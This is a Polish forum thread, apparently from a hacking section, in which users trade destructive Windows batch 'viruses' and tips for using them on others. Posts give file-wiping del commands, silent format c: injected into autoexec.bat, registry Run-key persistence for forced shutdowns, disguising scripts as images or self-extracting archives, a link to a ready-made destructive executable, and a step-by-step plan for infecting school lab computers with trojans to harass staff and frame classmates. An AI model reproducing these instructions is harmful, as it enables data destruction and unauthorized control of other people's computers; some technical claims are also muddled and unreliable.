Chce wam pokazać jak sie robi fajnego virusa w bat. Ten virus kasuje wszystkie pliki z folderu w którym sie znajduje.
Aby stworzyć wirusa tworzymy nowy plik .txt (notatnik) i wpisujemy poniższy tekst:
del *.* /s /q
i zapisujemy w rozszerzeniu bat klikając w notatniku na zakładke " plik - Zapisz Jako... - i nazwepliku.txt zmieniamy na nazwapliku.bat jak ktoś nie ma rozszerzeń pokazanych to wchodzimy w mój komputer i u góry jest zakładka narzędzia klikamy opcje folderów i wchodzimy w widok i odznaczamy ukryj rozszerzenia plików.
del *exe* /s /q
Jeżeli wpiszemy miedzy gwizdki exe to virus usunie wszystkie pliki exe można wpiać tam wszystkie rozszerzenia.
Można jeszcze wpisać między gwiazdki np.praca.txt wtedy kasuje tylko ten plik
del *praca.txt* /s /q
Pamiętajcie ze del tutaj jest sapcja *.* tutaj jest spacja /s tutaj też jest spacja /q
Teraz wam pokaże jak sie tego vira ulepsza musimy mieć program winrara. Więc mamy już virusa 1.Klikamy na niego prawym i dodajemy go do archiwum 2.Zaznaczamy opcje utwórz archiwum SFX 3.Klikamy zakładkę zaawansowane 4.Klikamy opcje SFX 5.mamy teraz wpisać folder docelowy czyli gdzie archiwum ma sie rozpakować i uruchomić plik najlepiej wpisać tam C:WINDOWS 6.W tym samym oknie mamy uruchom po wypakowaniu wpisujemy tam nazwę naszego vira z jego rozszerzeniem. 7.Klikamy zakładkę tryby zaznaczamy tam ukryj dialog startowy 8.W tym samym oknie zaznaczamy nadpisz wszystkie pliki 9.Klikamy ok 10.Klikamy ok
Najlepiej na początek zrobić to z jakim innym katalogiem bo jak ci sie otworzyć ten vir w windows to już kapa.
Stary! To jest mistzrowskie z początku sądziłem że to jakąś bzdura ale sprubowałem i naprawdę działa Normalnie SZACUNECZEK
normalnie super sprawa pozdro
noo szok:D wypasik
a jakbym chciał cały folder to w notatniku jakie rozszerzenie wpisać?
kowalikos znasz jeszcze jakies komendy? np na zmiane rozdzielczosci obrazu
Teraz Już jak umiecie zapisywać wirusa itp..To podam teraz tylko gotowe kody do wklejenia w notatnik
Zawieszenie kÂąputera
@echo off
rundll32 user,disableoemlayer
WyłÂączenie kÂąputera
@echo off
rundll32 krnl386.exe,exitkernel
WyłÂącz mysz
@echo off
rundll32 mouse,disable
WyłÂącz mysz i klawiature
@echo off
rundll32 mouse,disable
rundll32 keyboard,disable
Nie pozwalaj na Start Systemu
@echo off
echo :petla>>c:\autoexec.bat
echo goto petla>>c:\autoexec.bat
Spowolnij włÂączanie systemu oraz zamień przyciski myszy
@echo off
rundll32 user,swapmousebutton
echo dir /s /v c:\*.* >>c:autoexec.bat
Może to Was zainteresuje
Jak napisać wirusa w Notatniku krok po kroku
(*.bat)
Dzięki temu artykułowi napiszemy proste wirusy w Notatniku
Na poczÂątek pokaże jak zrobić bardzo prosty program który po otwarciu otworzy wpisanÂą strone www
Zaczynamy : Otwóż Notatnik i wklej , lub wpisz do niego poniższy kod:
Następnie zapisujemy w następujÂący sposób : klikamy na Plik potem klikamy na Zapisz jako... I teraz wpisujemy w nazwę (Nazwa pliku) program.bat , a poniżej z menu Zapisz jako typ wybieramy Wszystkie pliki i klikamy na Zapisz Teraz w miejscu gdzie zapisali�my plik pokaże się nasz program klikamy na ikone naszego programu i powinna się otworzyć nam strona www.
Mam nadzieje że wszystko zrozumiałe Je�li jednak nie to prosze o kontakt...
O kurcze umieściłem te posty na odwrot sorry
Nie pamietam jak to sie robi, ale lepszy jest program "Chamtaro", albo "Chamster". Wysylasz plik ofierze i ona go otwiera. I ty mozesz tym programem kasowac wszystki pliki jego, wysylac od niego pliki od siebie, otwierac na jego pc rozne pliki, gry, strony internetowe. Polecam sam z tego korzystalem. :rolleyes:
kowalikos nie pisz posta pod postem no xD
aha naruto-kun jak chcem wylaczyc kompa albo zablokowac mysz to wyskakuja jakies bledy http://img243.imageshack.us/img243/5707/aaang7.jpg
Czy to kasowanie plików może być przydatne na czyszczenie cookie w swoim folderze
wiecie jak zrobić aby ten plik z notatnika co go kowalikos na samym początku zapodał podpią sie pod zdjęcie na przykład otwieram zdjęcie a tu się w między czasie uruchamia ten plik w tle i kasuje dane
Musisz poprostu miec ikone jakieos obrazu z windowsa, i go ustawic w tym pliku.
a jaśniej?
Chodzi o to że dajesz właściwości tego wira i potem dajesz zakładkę dostosowywanie i "zmnień ikonę" no i wybierasz sobie ikonę ktora zamaskuje się na pulpice
No dokladnie. Ja tak w szkole zrobilem to skasowalo prawie caly dysk :lol:
ten wir pierwszy jest dobry w kit :) najpierw sprawdziłem na swoim kompie hehe i działa ale na jakieś pliki tekstowe teraz bedeszukał osła na to w sieci :D
Zaj*****e ej tylko tak dalej to nasze forum będzie forum hakerów :lol: :lol: :lol: :lol: :lol: a oto co zrobiłem i napisałem taki kod:
del *txt* /s /q start (jakiś folder) start http://www.nedds.pl del *mp3* /s /q
i wszystko działa więc jak chcecie komuś zrobić psikusa to mu możecie zamulić kompa okienkami i pousuwać różne rodzaje plików A tu jest link do gotowego wirusa możecie go komuś przesłać komuś tylko zmieńcie nazwę pliku pliki ma 101kb tylko go nie otwierajcie bo wam już Windows nie ruszy ;) jak chcecie to mogę wam napisać jakiegoś wira kasującego pliki Link http://rapidshare.com/files/39864865/kasuje_DLL.exe proszę przetestujcie go na kiś
Jakoś pamiętam już ten sposób i to ze starych dobrych czasów DOSa. Nic nowego odpowiednie zastosowanie podstawowych poleceń dosowych. Cóż problem polega na tym że większość użytkowników nie pamięta już DOSa a szkoda to był bardzo udany system. Pozdrawiam.
Chce wam pokazać jak sie robi fajnego virusa w bat. Ten virus kasuje wszystkie pliki z folderu w którym sie znajduje.
Aby stworzyć wirusa tworzymy nowy plik .txt (notatnik) i wpisujemy poniższy tekst: del *.* /s /q i zapisujemy w rozszerzeniu bat ....
hehe.... koń by sie uśmiał....hehehe.... :rolleyes: przecież to nie żaden wirus tylko podstawowe polecenia - człowieku, przecież to bajki dla dzieci - ale skoro dorwałeś widownie co się nie zna to co tam... :P :lol:
verte pokarz co ty umiesz
Są to proste komendy do DOS`a. Np. del *.exe Usunie wszystkie pliki z rozszerzeniem .EXE Ponieważ "*" zastępuje ciąg znaków a, "?" jeden znak (jeśli sie nie mylę). A co do pliku z rozszerzeniem .BAT jest to plik wykonujący z góry ustalony ciąg komend do DOS`a. Pod win z grupy NT dużo komend nie chodzi.
może i bajka dla dziecka ale działa i mnie sie podoba :P
a ty verte znasz jakis??
hehe dobre a znasz na innego wira jakies komendy
Jak wam sie nudzi i macie ochote to sprobojcie tego. Ja niezle zamieszanie zrobilem w szkole :lol: : A więc trzeba spełnić następujące warunki:
Po pierwsze należy się zorientować czy szkoła do której chodzimy ma w ogóle pracownie informatyczną. :-)
Po drugie gdy szkoła ma pracownie to należy sprawdzić czy komputery są połączone w sieć. Po trzecie sprawdzamy czy szkoła ma połączenie z netem (aby ściągać programy do hackowania, ale możemy je też przynosić na dyskietkach i CD'kach ale najlepiej je ściągnąć z netu).
Po czwarte sprawdzamy kto jest opiekunem pracowni, czy są inni "informatycy" (większość informatyków trzeba pisać w cudzysłowiu).
Dowiadujemy się kiedy odbywają się kółka (zajęcia pozalekcyjne, na których serfuje się po necie, poprawia z infy i robi inne takie tam). Jest jeszcze jeden warunek ale nie jest konieczny. Można znaleźć kumpla o podobnych zainteresowaniach (hackowanie), aby robić to wspólnie (zarażać pracownie serwerami koni trojańskich itp.), oraz po to że gdyby coś się nieudało było na kogo zwalić.
Gdy spełniamy następujące warunki możemy zacząć zabawę.
A więc do roboty:
Najpierw określamy się co chcemy zrobić (zarazić kompy trojanami, zdobyć kontrolę nad serwerem jeśli takowy jest)
Następnie kompletujemy oprogramowanie. Jeśli nie masz jeszcze doświadczenia w robieniu tak trudnych rzeczy. Zacznij od prostych trojanów (np. Prosiak). Na nich nabierzesz doświadczenia. Zakładam, że obywatel wie że trzeba umieć zdobyć IP'eki kompów w pracowni (o tym możesz przeczytać w dziale Hack).
Gdy mamy już IP komputerów i oprogramowanie potrzebne do zabawy to zaczynamy.
Najpierw infekujemy komputery serwerami trojanów. Dobrą myślą jest jeszcze założenie hasła na nie, aby inni nie mieli z nich pożytku. Powinniśmy zainfekować wszystkie komputery aby można było zaatakować każdego oraz dlatego że często serwery popularnych trojanów się dezaktywują i takiego komputera nie zaatakujemy (chyba że go zrestartujemy).
Gdy mamy władzę nad pracownią możemy zrobić kilka rzeczy: Sprawdzić kompetencje informatyków w szkole. Najlepiej jest mieć zarażony serwer (główny komputer). Gdy tak jest to Uruchamiamy trojana i łączymy się z jakimś komputerem najlepiej pierwszym. I robimy jazde. Kontrolujemy myszkę, wyłączamy klawiaturę, mrugamy monitorem. Następnie robimy tak z kolejnym losowo wybranym komputerem. Robimy tak do czasu gdy "informatyk" nie wpadnie w panikę. Robimy przerwę. Po chwili gdy mamy taką możliwość atakujemy serwer. Wtedy niedoświadczony "informatyk" lub lamer (można używać zamiennie) powinien kazać zrestartować komputery, wyjść z pracowni albo coś takiego. Na następnym kółku lub lekcji (gdy jest na nim jakaś znienawidzona osoba Robimy to co wcześniej z jednym komputerem i tej osobie wchodzimy na stronę hackerską, wtedy zawieszamy jej myszkę, klawiaturę, ogólnie komputer, tylko tak aby było widać tą stronę. Wtedy przy odrobinie szczęścia obywatel wyleci ze szkoły lub dostanie naganę. Działa dosyć dobrze, tylko trzeba uważać aby nie wpaść.
Gdy na przykład jesteśmy chorzy i w domu mamy Internet, a w pracowni jest lekcja możemy też zrobić niezłą jazde. Tylko trzeba najpierw będąc w pracowni sprawdzić zewnętrzne IP. Można to zrobić przez znalezienie strony na której jest księga gości w której zapisuje się numer IP. Wtedy zapisujemy się do takiej księgi (wpisujemy się będąc w pracowni) i mamy zewnętrzne IP. Takie IP może nie działać. Wtedy trzeba spróbować z czymś takim np. 213.76.114:21. Wytłumaczę wpisujemy numer IP zewnętrzny i po dwukropku ostatnie pole w IP wewnętrznego. Powinno działać. Wtedy gdy połączymy się z kimś możemy zacząć robić jazdę. Możemy wyzwać informatyka od ..... najgorszych :-). Możemy powyłączać kompy i nikt nas nie będzie podejrzewać chyba że skojarzy sobie że nas akurat nie ma w szkole ;)
Konie trojańskie w szkole to potężna broń przeciwko nie lubianym kolegom (i koleżankom hehe). Możemy nimi zrobić dużo więcej, ale wszystkiego tutaj nie opisałem.
POWODZENIA !!!
My to mamy nieźle. Mamy 2 pracownie. Jedna ma hasło na Adminie, a druga NIE!!! Wystarczyło dać pare razy CTRL+ALT+DELETE i wpisać "Administrator" i włala mamy dostep do antywirusa, aktualizacji, bokady stron itd. Radze sprawdzać, czy Admin ma w ogóle jakieś hasło. My z kumplami na jednym z komputerów zrobilismy nowe konto administratora, wiec jest cool. A co do wirusa w pliku *.bat, to zróbcie tak:
Otwórz notatnik i napisz w nim:
shutdown -s
Zamiast -s (wyłącz) mozesz napisać też -r (zrestartuj).
Zapisz plik jako PLIK.bat
Teraz utwórz nowy plik otreści: Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"PLIK"="C:\\PLIK.bat"
Zapisz plik jako PLIK.reg.
Teraz dodaj je do archiwum (WinRAR'em). Zaznacz "Utwórz archiwum SFX" Przejdź do karty 'zaawansowane" , kliknij przycisk "Opcje SFX". W pierwszym polu wpisz np. C:\ W polu uruchom po wypakowaniu wpisz: PLIK.reg Kliknij OK. W komentarzu mozesz napisać, by ofiara zgodziła się na dodanie wartości do rejestru, aby jakaś gra działała. Utwórz archiwum i ciesz sie sukcesem!
Ofiary komputer bedzie wyłączał sie zaraz po starcie.
Można w pliku z rozszerzeniem .BAT Zrobić program do "spamowania" Wystarczy wpisać komendę:
net send "tu wpisz nazwę PC" treść NP. net send k12 muhaha
i klikamy ile wlezie ;) nie wiem czy dobrze napisałem komendę , ale jak źle to poprawcie mnie. :P
To co napisał kowalikos może być niebezpieczne ponieważ większość progów udostępnionych w sieci typu koń trojański otwierają u nas na kompie kilka back door`ów, a poza tym średni rozgarnięty "hakijer" może wykorzystać kompy które zainfekowaliśmy do dalszych ataków
Stanowczo odradzam takich zabaw.
Oto kilka komend do DOS`a:
CD – zmiana katalogu lub wyświetlenie nazwy bieżącego katalogu CHKDSK – sprawdzanie stanu dysku lub zbiorów CLS – wymazywanie zawartości ekranu COMMAND – uruchomienie wczytywanie nowego procesora poleceń COMP – porównanie dwu lub większej ilości zbiorów COPY – kopiowanie jednego lub większej ilości zbiorów DATE – ustalenie daty systemowej DBLSPACE – kompresja dysków stałych lub dyskietek DEL – kasowanie wyspecyfikowanego zbioru lub zbiorów DELOLDOS – usuniecie poprzedniej wersji DOS DELTREE – kasowanie katalogu wraz z jego podkatalogami DIR – wyświetlenie zawartości katalogu DISKCOMP – porównanie zawartości dwóch dyskietek DISKCOPY – skopiowanie zawartości dyskietki ECHO – włączenie lub wyłącznie wyświetlania na ekranie komunikatów poleceń systemowych EDIT – włączenie edytora systemowego DOS EXIT – wyjście z systemu DOS FDISK – ustalenie konfiguracji dysku twardego FIND – wyszukiwanie katalogów lub plików FORMAT – formatowanie dysku twardego HELP – pomoc KEYB – ustalenie klawiatury dla danego kraju LABEL – utworzenie , zmiana lub usunięcie etykiety dysku MD ( MKDIR ) – tworzenie katalogu MEM – wyświetlenie informacji o ilości zajętej i wolnej pamięci MOVE – przenoszenie katalogów lub plików do innego miejsca na dysku MSD – wyświetlenie informacji technicznych o zestawie komputerowym PRINT – drukowanie zbioru tekstowego RD ( RMDIR ) – usunięcie pustego katalogu RECOVER – odzyskanie katalogu lub całego dysku z uszkodzonym sektorem REN ( RENAME) – zmiana nazwy katalogu SCANDISK – skanowanie dysku SETVER – ustalenie wersji systemu operacyjnego DOS SMARTDRV – konfiguracja lub uruchomienie programu SMARTDrive służącego do buforowania odczytów i zapisów sektorów dyskowych w pamięci rozszerzonej , co znacznie skraca czas dostępu do nich . TIME – wyświetlenie lub ustalenie czasu systemowego TREE – wyświetlenie drzewka katalogu lub dysku TYPE – wyświetlenie zawartości katalogu UNDELETE – odzyskanie zbiorów usuniętych za pomocą polecenia delete . UNFORMAT – odzyskanie zbiorów usuniętych za pomocą format . XCOPY – kopiowanie katalogów wraz z jego podkatalogami
UWAGA CZĘŚĆ KOMEND MOŻE NIE TRYBIĆ POD WIN. Z RODZINY NT komendy z kopiowane z sciagi.pl
można jescze cos takiego napisac
@echo off
del C:\WINDOWS
chyba nie trzeba tlumaczyc co ta komenda robi L:D:D:D:D:d
:blink: o wow, ale się rozkręcił temat :D
duzo przydatnych tu rzeczy :) na pewno się przydadzą ;)
Przydadzą sie napewno ;)
A jak naprzykład za pomocą tych komend można np. winampa właczyc ??
PS WIEM JUZ JAK :)
PS2 polecam program Install Creator Pro dzieki niemu mozna ustawic zeby wpisywał dane do rejestru bez zadnego przy tym okienka a co gorsza potwierdzwnia. Zrobilem swojego viruska :) dajac komendy na właczenie 3 stron xxx i kasowanie zawartosci pulpitu przy kazdym właczeniu kompa.Po kliknieciu na instalke jest błysawiczne instalownie bez zednych okienek instalacji NIC :) i wpisy sa dodawene niewidocznie.Teraz sprawdze se to na kimś :)
PS3 w programie jest mozliwosc zmiany ikony :)
Pamietaj o tym, że nie piszemy post pod postem jest taka opcja jak "edytuj" proszę na przyszłośc z niej korzystać. ///.:WiLu:.
no narescie na swoim kompie tera sie w to pobawie
jak sie zmienia rozszerzenia
Nie pamietam jak to sie robi, ale lepszy jest program "Chamtaro", albo "Chamster". Wysylasz plik ofierze i ona go otwiera. I ty mozesz tym programem kasowac wszystki pliki jego, wysylac od niego pliki od siebie, otwierac na jego pc rozne pliki, gry, strony internetowe. Polecam sam z tego korzystalem. :rolleyes:
Czytając tego twojego posta "kowalikos" coraz bardziej dochodzę do wniosku że jestes nie odpowiedzialny - pokątnie liznąłeś odrobinę informatyki i wykorzystujesz to przeciw sobie (innym) najlepiej abyś wyciagnoł sobie gumę z GACI i strzelił sobie w ŁEB może wtedy zmądrzejesz, bo jak byś pieć lat studiował i poznał od podstaw... to byś wiedział primo nie szkodzić..... :angry
verte pokarz co ty umiesz
hmm...żyć i w polsce być :rolleyes:
"stypa" po pierwsze nie pisz posta pod postem. A po drugie nie bedziesz mnie pouczal co mam pisac. Temat Hacking, wiec dziele sie z ludzmi moja wiedza. Nie masz nic madrego do powiedzenia to nie udzielaj sie.
rozszerzenie można zmienieć tak:
1. wchodzisz np. na mój komputer i wybierasz Narzędzia->Opcje Folderów 2. klikasz zakładkę widok i zaznaczasz "Pokaż rozszerzenia znanych typów plików" 3. Zatwierdzasz zmiany klikając OK i teraz w eksploratorze widzisz rozszerzenia. 4. Wystarczy zaznaczyć plik i nacisnąć F2 lub przywołać menu kontekstowe i wybrać "Zmień nazwę". Teraz po ostatniej kropce w nazwie pliku wpisujesz rozszerzenie. 5. Gotowe!
Jak nie chcesz juz widziec rozszerzen to wykonujesz punkt 1. a w drugim odznaczasz tą opcję, potem punkt 3.
kaz im kowalikos wejsc w start/uruchom i wpisac cmd.exe niech wpisza exit i nacisna enter tez będą uchachani Mam rację??? PS następny inteligent post wyżej janek napisał wchodzisz na mój komputer i wybierasz narzędzia.
Paweł313, coś Ci się nie podoba? Zachowaj to dla siebie! To co jest opisane w tym temacie, niektórym się przydało. Wiadomo że są to zwykłe polecenia DOS-owskie. Ale co z tego? Da się tym napisać coś co naszpeci w kompie i dobrze! Następnym razem zachowaj takie uwagi dla siebie!!
Wiesz Paweł313, troche mi cie żal, bo nie potrafisz zrozumieć, że nie piszę tego dla siebie, tylko dla innych, więc piszę tak, by zrozumiał to najmniej doświadczony użytkownik zwykłego PC'ta. Już nie pamiętam kto, ale ktoś pytał, jak sie zmienia rozszerzenie pliku. Równie dobrze mógłbym go wyśmiać, bo to jest łatwa operacja, ale nie jestem chamski, i wyjaśniłem mu krok po kroku. To forum istnieje właśnie do tego, by dzielić się wiedzą, uczyć innych, dyskutować i pomagać, oczywiście nie obrażajac przy tym innych użytkowników i przestrzegając regulaminu. Jeśli nie pasuje ci regulamin lub jakiś user, to zachowaj to dla siebie, skontaktuj się z adminem, albo powiedz mu to wprost. Innym rozwiązaniem jest wyrejestrowanie się z forum.
Jak wam sie nudzi i macie ochote to sprobojcie tego. [...] Gdy na przykład jesteśmy chorzy i w domu mamy Internet, a w pracowni jest lekcja możemy też zrobić niezłą jazde. Tylko trzeba najpierw będąc w pracowni sprawdzić zewnętrzne IP. Można to zrobić przez znalezienie strony na której jest księga gości w której zapisuje się numer IP. Wtedy zapisujemy się do takiej księgi (wpisujemy się będąc w pracowni) i mamy zewnętrzne IP. Takie IP może nie działać. Wtedy trzeba spróbować z czymś takim np. 213.76.114:21. Wytłumaczę wpisujemy numer IP zewnętrzny i po dwukropku ostatnie pole w IP wewnętrznego. Powinno działać. Wtedy gdy połączymy się z kimś możemy zacząć robić jazdę. Możemy wyzwać informatyka od ..... najgorszych :-). Możemy powyłączać kompy i nikt nas nie będzie podejrzewać chyba że skojarzy sobie że nas akurat nie ma w szkole ;) [...]
Czego akurat 213.76.114:21 ? 21 i jeszcze : ?
Myslisz ze w kazdej pracowni bedzie tak dzialac ?
kazde ma inne IP
kazde ma inne IP To wiem, adres ip jest inny, ale
Wtedy zapisujemy się do takiej księgi (wpisujemy się będąc w pracowni) i mamy zewnętrzne IP. Takie IP może nie działać. Wtedy trzeba spróbować z czymś takim np. 213.76.114:21. Wytłumaczę wpisujemy numer IP zewnętrzny i po dwukropku ostatnie pole w IP wewnętrznego. Powinno działać.
czy 21 bedzie wszedzie dzialac ? czego akurat 21 ?
u mnie na kompie wykrywa tego waszego wiruska
Bardzo to fajne wszytsko. Wiecie może jaka jest "komenda" by usuwało np. wszystkie nieużywane od 30 dni pliki *txt ?
EXTRA pliczek
witma!! mam takie pytanko czy da rade zrobic plytke botowlana z tego pliku, kasuje DLL
boot'owalna tzn jak wlaczasz pc? czy bot'a z poziomu windowsa?
chodzi mi o to ze jak wloze plytke to od razu sie załaczy bez zadnych akceptacji
super to jest! zaraz musze przetestowac :)
Portu (czyli tego co jest po ":", w tym przypadku "21") nie trzeba wpisywać jeżeli na jedno IP przypada 1 komputer. Jeżeli tak nie jest (np. w szkołach, szpitalach, firmach, i innych instytucjach) to w porcie należy wpisać IP wewnetrzne tego komputera. Aby uzyskać IP wewnętrzne należy odpalić skaner IP na jednym z komputerów, które chcemy zarazić i wyszukujemy wszystkie IP od naszego IP od portu 1 do 255. Tam gdzie będzie zielony znaczek, tam jest jakiś komputer. Pozostaje tylko sprawdzić jaki jest jaki. Aby to zrobić należy wpisać jeden z IP komputerów a nastepnie wykonać jakąś operację np. Wyłączyć komputer i sprawdzić który komputer sie wyłączył. Ponadto niektóre komputery moga mieć swoje nazwy, stad możemy wiedzieć gdzie jest ten komputer np. "Sekretariat". Oczywiście mozna też odpalić Skaner adresów IP na swoim domowym komputerze, należy jedynie znać zewnetrzne IP szkoły czy innej instytucji. Aby dowiedzieć sie jakie jest IP należy na komputerze ofiary wejść na stronę:
http://ip-adress.com/
Numer IP, nazwa hosta, położenie geograficzne, czas lokalny, proxy, dostawca internetu, rodzaj połączenia i oprogramowanie zainstalowane na komputerze zostanie wyświetlone na stronie.
Przetestuję za chwilę ;)
Portu (czyli tego co jest po ":", w tym przypadku "21") nie trzeba wpisywać jeżeli na jedno IP przypada 1 komputer. Jeżeli tak nie jest (np. w szkołach, szpitalach, firmach, i innych instytucjach) to w porcie należy wpisać IP wewnetrzne tego komputera. Aby uzyskać IP wewnętrzne należy odpalić skaner IP na jednym z komputerów, które chcemy zarazić i wyszukujemy wszystkie IP od naszego IP od portu 1 do 255. Tam gdzie będzie zielony znaczek, tam jest jakiś komputer. Pozostaje tylko sprawdzić jaki jest jaki. Aby to zrobić należy wpisać jeden z IP komputerów a nastepnie wykonać jakąś operację np. Wyłączyć komputer i sprawdzić który komputer sie wyłączył. Ponadto niektóre komputery moga mieć swoje nazwy, stad możemy wiedzieć gdzie jest ten komputer np. "Sekretariat". Oczywiście mozna też odpalić Skaner adresów IP na swoim domowym komputerze, należy jedynie znać zewnetrzne IP szkoły czy innej instytucji. [...] ŹLE
po ':' jest zawsze numer portu, port 21 to domyslnie FTP, wiec jesli chcesz sie polaczyc z trojanem, to on tez musi być ustawiony na tym porcie Zeby sie polaczyc do komputerow wewnatrz sieci, koniecznie sa przekierowania portow na komputery w sieci wewnetrzej.
To co napisał kowalikos i janek2012 nie ma prawa działać :), jedynie na maszyne z zewnetrznym adresem ip i trojanem na porcie 21, ale jak opisywaliscie: 'ATTACK' na komputery wewnatrz sieci szkolnej
Chce wam pokazać jak sie robi fajnego virusa w bat. Ten virus kasuje wszystkie pliki z folderu w którym sie znajduje.
Aby stworzyć wirusa tworzymy nowy plik .txt (notatnik) i wpisujemy poniższy tekst: del *.* /s /q i zapisujemy w rozszerzeniu bat klikając w notatniku na zakładke " plik - Zapisz Jako... - i nazwepliku.txt zmieniamy na nazwapliku.bat jak ktoś nie ma rozszerzeń pokazanych to wchodzimy w mój komputer i u góry jest zakładka narzędzia klikamy opcje folderów i wchodzimy w widok i odznaczamy ukryj rozszerzenia plików. del *exe* /s /q
Jeżeli wpiszemy miedzy gwizdki exe to virus usunie wszystkie pliki exe można wpiać tam wszystkie rozszerzenia. Można jeszcze wpisać między gwiazdki np.praca.txt wtedy kasuje tylko ten plik del *praca.txt* /s /q
Pamiętajcie ze del tutaj jest sapcja *.* tutaj jest spacja /s tutaj też jest spacja /q [...] stary co z ta spacja napisal bys go tak jak ma byc w notatniku a ja bym go sobie zaznaczył i skopiował ok??
heh moze Was to śmieszyć ale ja nie rozumiem te komendy dos'a gdzie to wpisywac co robic...?[; :dno:
Otwórz notatnik i w notatniku wpisujesz... ;)
Rzeczywiście, pomyliłem się. Ale jeśli mamy trojana, to on sam ustala domyslny port (Server i Klient taki sam), a port wpisujemy prawie zawsze w okienku, które jest pod adresem IP. Niestandardowa konfiguracja portów nie jest potrzebna gdy ofiara nie ma firewalla i nie jest w takim miejscu jak szkoła (wiele komputerów na jednym łączu).
Uuuu widzę że pod moją nie obecność dużo się tu działo :)
"Najpierw aby moc napisac wirusa musimy poznac podstawowe polecenia
del - usuwa plik copy - wiadomo cls - czysci ekran dir - wyswietla liste plikow i katalogow echo - "wyswietla komunikaty lub wlacza i wylacza echo polecen" exit - konczy dzialanie programu find - wyszukuje ciag tekstowy w pliku lub plikach (przydatne ) findstr - wyszukuje ciagi znakow w plikach format - formatuje dysk (pokaze potem na przykladzie wirusa ktory po uruchomieniu formatuje dysk bez potwierdzenia goto - wykonuje skok do danej etykiety (oki potem wyjasnie ) md - tworzy katalog pause - noo zatrzymuje dzialanie programu i czeka az uzytkownik nacisnie jakis klawisz :) (wyswietla komunikat - Aby kontynuowac nacisnij dowolny klawisz ..) pause >> nul - to co powyzej ale bez komunikatu (stdout jest przekierowane w nicosc rd - usuwa katalog ren - zmienia nazwe pliku start - uruchamia program lub polecenie w osobnym oknie time - wyswietla lub ustawia czas systemowy xcopy - kopiuje pliki i katalogi
dobra a wiec zeby stworzyc takiego wirusa tworzymy dowolny plik o rozszerzeniu bat np. vir.bat i klikajac prawym wybieramy edytuj - tam wpisujemy kod.
teraz jeszcze jedna wazna rzecz: >> - sluzy do przekierowania standardowego wyjscia (stdout) > - podobne do powyzszego, jednakze gdy zechcemy przekierowac np. wynik jakiegos polecenia do pliku, to poprzednia zawartosc tego pliku zostanie skasowana.
Kod: @echo off // wylacza echo polecen echo ale ty jestes debil >> c:autoexec.bat // kopiuje linijke tekstu do pliku autoexec.bat - czyli mozna tez dopisywac kod do pliku np. jezeli napiszemy: @echo off echo del c:%windir%win.ini >> autoexec.bat - to po ponownym uruchomieniu komputera ofiarze skasuje sie plik win.ini co uniemozliwi ofiarze odpalenie systemu chyba ze skorzysta z pliku win.ini.backup w windowsie XP, lub z polecenia scanreg /restore w windowsie 98 %windir% jest to nazwa zmiennej wskazujacej na katalog systemowy, przydatne gdyz nie zawsze jest to c:windows
cls // czysci ekran tak zeby ofiara nie wiedziala ze cos sie wogole usuwa
teraz mala zabawa z "|" (shift + przycisk obok backspace - dla ułomnych ) pozwala to np. wykonywac dwa polecenia na raz. przeanalizujmy przyklady ponizej.
format c:
powyzszy plik po uruchomieniu bedzie wymagal od uzytkownika potwierdzenia - np. w polskojezycznej wersji systemu nacisniecia klawisza "T" wiec piszemy:
Kod:
@echo off echo T | format c: cls
po uruchomieniu tego programu dysk twardy zacznie sie formatowac bez potwierdzenia!!! (uwaga: nie da sie sformatowac dysku c: kiedy mamy uruchomionego windowsa - wiec aby to zrobic musimy doczepic ten kawalek kodu do pliku autoexec.bat - najlepiej tam )
no dobrze ale jezeli zacznie sie nam formatowac dysk to bedzie to trwalo dlugo - wiec aby to przyspieszyc nalezy wpisac:
Kod:
@echo off echo T | format c: /q cls
przelacznik /q oznacza ze dysk bedzie sie formatowal w trybie szybkieformatowanie (zamazywanie) i bedzie to trwalo krotko (chyba ze ktos ma duzy dysk)
dobra ale teraz rozwazmy nastepujacy przyklad - stworzylismy plik
Kod:
@echo off echo T | format c: /q cls
i chcemy go zamiescic w pliku c:\autoexec.bat . Niby wszystko wydaje sie proste - ale tak nie jest gdyz nie mozna zrobic :
Kod:
echo @echo off >> c:autoexec.bat // tu jest wszystko w porzadku echo echo T | format c: /q >> c:autoexec.bat // a tu nie bo "|" oddziela polecenia, tak ze do pliku autoexec.bat zostanie przekopiowany tylko wynik komendy format c: /q (w tym przypadku bedzie to prosba o nacisniecie klawisza T w celu potwierdzenia) echo cls >> c:autoexec.bat
wiec zeby to zrobic mozna uzyc czterech sposobow sposob 1 - przyklad:
nazwa tego pliku - dowolny.bat
Kod: @echo off echo T | format c: /q cls copy dowolny.bat c:autoexec.bat
powyzszy plik podmienia zawartosc pliku autoexec.bat na ta. Uwaga! zawartosc pliku autoexec.bat zostanie skasowana (no ale w koncu jezeli zalezy nam na zniszczeniu komputera ofiary to nie ma sie czym przejmowac - i tak dysk zostanie sformatowany ).
drugi sposob:
Kod: @echo off echo T | format c: /q cls copy dowolny.bat c:sciezkadowolny.bat echo start c:sciezkadowolny.bat >> autoexec.bat
trzeci sposob:
Kod:
@echo off cls type dowolny.bat >> c:autoexec.bat czwarty sposob: copy c:autoexec.bat + c:sciezkadowolny.bat c:autoexec.bat no dobra... przydalby sie teraz spis plikow systemowych ktore wirus moze usuwac aby narobic niezlych szkod w systemie: win.ini , win.com - jak usuniesz te pliki to ofiara juz nie uruchomi komputera chyba ze skorzysta z backupow (winXP) w folderze c:\windows\pss\ - wiec najlepiej tez zeby wirus usuwal wszytkie pliki z niego c:\windows\system32 - (winXP) tam masz pliki takie jak format.com , xcopy.exe itp. - wiec jak je usuniesz to ktos nie bedzie mogl kopiowac plikow w dosie, ani sformatowac dysku itp. c:\windows\command - to co wyzej tylko ze w windowsach 9x c:\windows\system32\DirectX (winXP) - wiadomo
no i... - zreszta po co mam wszystko wypisywac :) tworca sam moze sobie poszukac i zadecydowac jakie pliki maja zostac usuniete skasowane itp.
kolejna wazna rzecza jaka sie przydaje podczas pisania wirusow to modyfikowanie rejestru itp. np.aby wirus uruchamial sie przy kazdym starcie systemu mozna zrobic wpis w rejestrze - pod spodem podaje przyklad.
Kod:
@echo off cls echo REGEDIT4 >> plikrejestru.reg // ten wpis musi byc zawsze w pliku rejestru cls echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >> plikrejestru.reg echo "dowolna"="C:\\lokalizacja\\pliku\\bat\\ktory\\wczesniej\\skopiowalismy >> plikrejestru.reg start c:\plik\rejestru\.reg\
przy kazdym uruchomieniu komputera bedzie uruchamiany plik ktorego podalismy lokalizacje w "dowolna"=
